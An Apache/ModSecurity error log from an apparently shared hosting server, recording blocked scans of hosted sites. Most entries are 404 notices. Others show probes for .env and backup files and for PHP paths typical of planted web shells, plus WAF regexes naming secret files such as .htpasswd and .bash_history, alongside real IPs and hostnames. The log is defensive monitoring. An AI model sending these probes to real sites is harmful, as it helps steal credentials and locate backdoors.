[Tue May 26 15:14:16.878019 2026] [security2:error] [pid 686593:tid 686712] [remote 45.148.10.95:28928] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.preetishah.moes-art.com"] [uri "/.env"] [unique_id "ahVrcOilgkZcvx0_tl_HYAAApnY"]
[Tue May 26 15:14:17.164972 2026] [security2:error] [pid 686593:tid 686631] [remote 45.148.10.95:28928] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.preetishah.moes-art.com"] [uri "/.env.bak"] [unique_id "ahVrceilgkZcvx0_tl_HeQAApiU"]
[Tue May 26 15:14:17.168064 2026] [security2:error] [pid 686593:tid 686718] [remote 45.148.10.95:28928] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.preetishah.moes-art.com"] [uri "/.env.backup"] [unique_id "ahVrceilgkZcvx0_tl_HfgAApnw"]
[Tue May 26 15:14:17.732205 2026] [security2:error] [pid 686593:tid 686746] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVrceilgkZcvx0_tl_HlQAAAJw"]
[Tue May 26 15:14:20.439978 2026] [security2:error] [pid 686593:tid 686803] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.preetishah.moes-art.com"] [uri "/index.php"] [unique_id "ahVrcOilgkZcvx0_tl_HVgAAANU"]
[Tue May 26 15:14:20.633432 2026] [security2:error] [pid 686593:tid 686754] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVrdOilgkZcvx0_tl_IBAAAAKQ"]
[Tue May 26 15:14:21.288137 2026] [security2:error] [pid 686593:tid 686829] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.preetishah.moes-art.com"] [uri "/index.php"] [unique_id "ahVrcOilgkZcvx0_tl_HVAAAAO8"]
[Tue May 26 15:14:21.307072 2026] [security2:error] [pid 686593:tid 686711] [remote 45.148.10.95:28928] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.preetishah.moes-art.com"] [uri "/index.php"] [unique_id "ahVrb-ilgkZcvx0_tl_HSwAApnU"]
[Tue May 26 15:14:21.345792 2026] [security2:error] [pid 686593:tid 686793] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.preetishah.moes-art.com"] [uri "/index.php"] [unique_id "ahVrceilgkZcvx0_tl_HawAAAMs"]
[Tue May 26 15:14:21.353798 2026] [security2:error] [pid 686593:tid 686810] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.preetishah.moes-art.com"] [uri "/index.php"] [unique_id "ahVrcOilgkZcvx0_tl_HZQAAANw"]
[Tue May 26 15:14:21.392550 2026] [security2:error] [pid 686593:tid 686658] [remote 45.148.10.95:28928] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.preetishah.moes-art.com"] [uri "/index.php"] [unique_id "ahVrb-ilgkZcvx0_tl_HUQAApkA"]
[Tue May 26 15:14:21.410331 2026] [security2:error] [pid 686593:tid 686817] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.preetishah.moes-art.com"] [uri "/index.php"] [unique_id "ahVrceilgkZcvx0_tl_HiAAAAOM"]
[Tue May 26 15:14:22.279816 2026] [security2:error] [pid 686593:tid 686839] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.preetishah.moes-art.com"] [uri "/index.php"] [unique_id "ahVrcOilgkZcvx0_tl_HWAAAAPk"]
[Tue May 26 15:14:22.301544 2026] [security2:error] [pid 686593:tid 686783] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.preetishah.moes-art.com"] [uri "/index.php"] [unique_id "ahVrcOilgkZcvx0_tl_HYgAAAME"]
[Tue May 26 15:14:22.339440 2026] [security2:error] [pid 686593:tid 686792] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.preetishah.moes-art.com"] [uri "/index.php"] [unique_id "ahVrceilgkZcvx0_tl_HjgAAAMo"]
[Tue May 26 15:14:22.345514 2026] [security2:error] [pid 686593:tid 686828] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.preetishah.moes-art.com"] [uri "/index.php"] [unique_id "ahVrceilgkZcvx0_tl_HhwAAAO4"]
[Tue May 26 15:14:22.423193 2026] [security2:error] [pid 686593:tid 686816] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.preetishah.moes-art.com"] [uri "/index.php"] [unique_id "ahVrceilgkZcvx0_tl_HbAAAAOI"]
[Tue May 26 15:14:22.431992 2026] [security2:error] [pid 686593:tid 686638] [remote 45.148.10.95:28928] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.preetishah.moes-art.com"] [uri "/index.php"] [unique_id "ahVrcOilgkZcvx0_tl_HXgAApiw"]
[Tue May 26 15:14:22.454027 2026] [security2:error] [pid 686593:tid 686766] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.preetishah.moes-art.com"] [uri "/index.php"] [unique_id "ahVrceilgkZcvx0_tl_HngAAALA"]
[Tue May 26 15:14:22.454564 2026] [security2:error] [pid 686593:tid 686831] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.preetishah.moes-art.com"] [uri "/index.php"] [unique_id "ahVrceilgkZcvx0_tl_HjwAAAPE"]
[Tue May 26 15:14:22.455657 2026] [security2:error] [pid 686593:tid 686729] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.preetishah.moes-art.com"] [uri "/index.php"] [unique_id "ahVrceilgkZcvx0_tl_HhgAAAIs"]
[Tue May 26 15:14:22.460157 2026] [security2:error] [pid 686593:tid 686845] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.preetishah.moes-art.com"] [uri "/index.php"] [unique_id "ahVrceilgkZcvx0_tl_HjQAAAP8"]
[Tue May 26 15:14:22.503823 2026] [security2:error] [pid 686593:tid 686809] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.preetishah.moes-art.com"] [uri "/index.php"] [unique_id "ahVrceilgkZcvx0_tl_HnQAAANs"]
[Tue May 26 15:14:22.561775 2026] [security2:error] [pid 686593:tid 686794] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.preetishah.moes-art.com"] [uri "/index.php"] [unique_id "ahVrceilgkZcvx0_tl_HiwAAAMw"]
[Tue May 26 15:14:22.584363 2026] [security2:error] [pid 686593:tid 686824] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVrduilgkZcvx0_tl_IQQAAAOo"]
[Tue May 26 15:14:24.261766 2026] [security2:error] [pid 686593:tid 686803] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVrd-ilgkZcvx0_tl_IdwAAANU"]
[Tue May 26 15:14:26.705733 2026] [security2:error] [pid 686593:tid 686818] [client 202.76.188.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVreuilgkZcvx0_tl_I0QAAAOQ"]
[Tue May 26 15:14:26.950310 2026] [security2:error] [pid 686593:tid 686763] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVreuilgkZcvx0_tl_I4QAAAK0"]
[Tue May 26 15:14:27.066971 2026] [core:crit] [pid 686593:tid 686737] (13)Permission denied: [client 157.55.39.58:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 15:14:28.461291 2026] [security2:error] [pid 686593:tid 686849] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVrfOilgkZcvx0_tl_JJwAAAQM"]
[Tue May 26 15:14:30.616661 2026] [security2:error] [pid 686593:tid 686835] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVrfuilgkZcvx0_tl_JbQAAAPU"]
[Tue May 26 15:14:31.818354 2026] [security2:error] [pid 686593:tid 686763] [client 85.121.240.156:44816] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "yndglobal.com"] [uri "/index.php"] [unique_id "ahVrf-ilgkZcvx0_tl_JowAAAK0"]
[Tue May 26 15:14:31.931620 2026] [core:crit] [pid 686593:tid 686849] (13)Permission denied: [client 40.77.167.7:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 15:14:33.265856 2026] [security2:error] [pid 686593:tid 686838] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVrgOilgkZcvx0_tl_JzAAAAPg"]
[Tue May 26 15:14:34.711643 2026] [security2:error] [pid 686593:tid 686785] [client 85.11.167.19:58132] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "staging.unsobered.com"] [uri "/.env"] [unique_id "ahVrguilgkZcvx0_tl_KEgAAAMM"]
[Tue May 26 15:14:35.089664 2026] [security2:error] [pid 686593:tid 686782] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVrguilgkZcvx0_tl_KDgAAAMA"]
[Tue May 26 15:14:35.426243 2026] [security2:error] [pid 686593:tid 686816] [client 85.11.167.19:58134] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "staging.unsobered.com"] [uri "/"] [unique_id "ahVrg-ilgkZcvx0_tl_KKAAAAOI"]
[Tue May 26 15:14:35.820276 2026] [security2:error] [pid 686593:tid 686824] [client 128.140.106.114:13660] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "thegoodsporting.com"] [uri "/index.php"] [unique_id "ahVrg-ilgkZcvx0_tl_KJgAAAOo"], referer: https://thegoodsporting.com
[Tue May 26 15:14:37.877748 2026] [security2:error] [pid 686593:tid 686793] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVrheilgkZcvx0_tl_KYwAAAMs"]
[Tue May 26 15:14:38.236137 2026] [http2:info] [pid 700087:tid 700087] h2_workers: created with min=128 max=192 idle_ms=600000
[Tue May 26 15:14:38.698487 2026] [security2:error] [pid 700087:tid 700232] [client 85.208.96.203:37410] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/january-20th/list/"] [unique_id "ahVrhpPHQM4as9fEIIZ1fwAAAA8"]
[Tue May 26 15:14:38.698618 2026] [security2:error] [pid 700087:tid 700232] [client 85.208.96.203:37410] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/january-20th/list/"] [unique_id "ahVrhpPHQM4as9fEIIZ1fwAAAA8"]
[Tue May 26 15:14:39.765290 2026] [security2:error] [pid 700087:tid 700262] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVrh5PHQM4as9fEIIZ1kwAAAC0"]
[Tue May 26 15:14:42.123033 2026] [security2:error] [pid 700087:tid 700226] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVriZPHQM4as9fEIIZ1yAAAAAk"]
[Tue May 26 15:14:42.891058 2026] [security2:error] [pid 700087:tid 700247] [client 85.121.240.156:33744] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "yndglobal.com"] [uri "/index.php"] [unique_id "ahVripPHQM4as9fEIIZ13AAAAB4"]
[Tue May 26 15:14:44.102153 2026] [security2:error] [pid 700087:tid 700316] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVri5PHQM4as9fEIIZ19wAAAGM"]
[Tue May 26 15:14:46.445571 2026] [security2:error] [pid 700087:tid 700300] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVrjpPHQM4as9fEIIZ2LQAAAFM"]
[Tue May 26 15:14:47.922272 2026] [security2:error] [pid 700087:tid 700239] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVrj5PHQM4as9fEIIZ2XwAAABY"]
[Tue May 26 15:14:50.635929 2026] [security2:error] [pid 700087:tid 700286] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVrkpPHQM4as9fEIIZ2sQAAAEU"]
[Tue May 26 15:14:52.758796 2026] [security2:error] [pid 700087:tid 700222] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVrlJPHQM4as9fEIIZ24QAAAAU"]
[Tue May 26 15:14:53.269195 2026] [core:crit] [pid 700087:tid 700290] (13)Permission denied: [client 40.77.167.7:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 15:14:53.465003 2026] [core:crit] [pid 700087:tid 700344] (13)Permission denied: [client 40.77.167.7:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 15:14:55.038463 2026] [core:crit] [pid 700087:tid 700264] (13)Permission denied: [client 157.55.39.58:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 15:14:55.094785 2026] [security2:error] [pid 700087:tid 700244] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVrlpPHQM4as9fEIIZ3KgAAABs"]
[Tue May 26 15:14:56.840522 2026] [core:crit] [pid 700087:tid 700304] (13)Permission denied: [client 157.55.39.58:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 15:14:57.127089 2026] [security2:error] [pid 700087:tid 700298] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVrmJPHQM4as9fEIIZ3XQAAAFE"]
[Tue May 26 15:14:57.639929 2026] [security2:error] [pid 700087:tid 700280] [client 45.154.98.150:57704] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 150.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cuatrodoce.com.mx"] [uri "/wp-content/plugins/fix/up.php"] [unique_id "ahVrmZPHQM4as9fEIIZ3fAAAAD8"]
[Tue May 26 15:14:57.642247 2026] [security2:error] [pid 700087:tid 700238] [client 45.154.98.150:57702] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 150.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cuatrodoce.com.mx"] [uri "/wp-plain.php"] [unique_id "ahVrmZPHQM4as9fEIIZ3fgAAABU"], referer: www.google.com
[Tue May 26 15:14:57.654980 2026] [security2:error] [pid 700087:tid 700312] [client 45.154.98.150:57700] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 150.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cuatrodoce.com.mx"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahVrmZPHQM4as9fEIIZ3fQAAAF8"], referer: www.google.com
[Tue May 26 15:14:57.936142 2026] [security2:error] [pid 700087:tid 700255] [client 45.154.98.150:58828] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 150.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cuatrodoce.com.mx"] [uri "/vpnqnose.php"] [unique_id "ahVrmZPHQM4as9fEIIZ3iAAAACY"], referer: www.google.com
[Tue May 26 15:14:58.097227 2026] [security2:error] [pid 700087:tid 700299] [client 45.154.98.150:58844] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 150.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cuatrodoce.com.mx"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahVrmpPHQM4as9fEIIZ3kAAAAFI"], referer: www.google.com
[Tue May 26 15:14:58.385307 2026] [security2:error] [pid 700087:tid 700330] [client 45.154.98.150:60303] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 150.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cuatrodoce.com.mx"] [uri "/wp-plain.php"] [unique_id "ahVrmpPHQM4as9fEIIZ3nQAAAHE"], referer: www.google.com
[Tue May 26 15:14:58.513145 2026] [security2:error] [pid 700087:tid 700263] [client 45.154.98.150:61953] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 150.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cuatrodoce.com.mx"] [uri "/wp-content/plugins/apikey/apikey.php"] [unique_id "ahVrmpPHQM4as9fEIIZ3qwAAAC4"]
[Tue May 26 15:14:58.532828 2026] [security2:error] [pid 700087:tid 700144] [remote 5.42.158.148:34134] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.158.42.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rohiniventures.com"] [uri "/wp-login.php"] [unique_id "ahVrmpPHQM4as9fEIIZ3mQAACDg"]
[Tue May 26 15:14:58.577514 2026] [security2:error] [pid 700087:tid 700336] [client 14.244.167.180:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVrmpPHQM4as9fEIIZ3kwAAAHc"]
[Tue May 26 15:14:58.804254 2026] [security2:error] [pid 700087:tid 700247] [client 45.154.98.150:62681] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 150.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cuatrodoce.com.mx"] [uri "/plugins/content/apismtp/apismtp.php"] [unique_id "ahVrmpPHQM4as9fEIIZ3swAAAB4"]
[Tue May 26 15:14:58.842522 2026] [security2:error] [pid 700087:tid 700251] [client 45.154.98.150:62216] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 150.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cuatrodoce.com.mx"] [uri "/nbwevntg.php"] [unique_id "ahVrmpPHQM4as9fEIIZ3tAAAACI"], referer: www.google.com
[Tue May 26 15:14:59.093903 2026] [security2:error] [pid 700087:tid 700267] [client 45.154.98.150:64224] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 150.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cuatrodoce.com.mx"] [uri "/wp-content/plugins/apikey/apikey.php.suspected"] [unique_id "ahVrm5PHQM4as9fEIIZ3vQAAADI"]
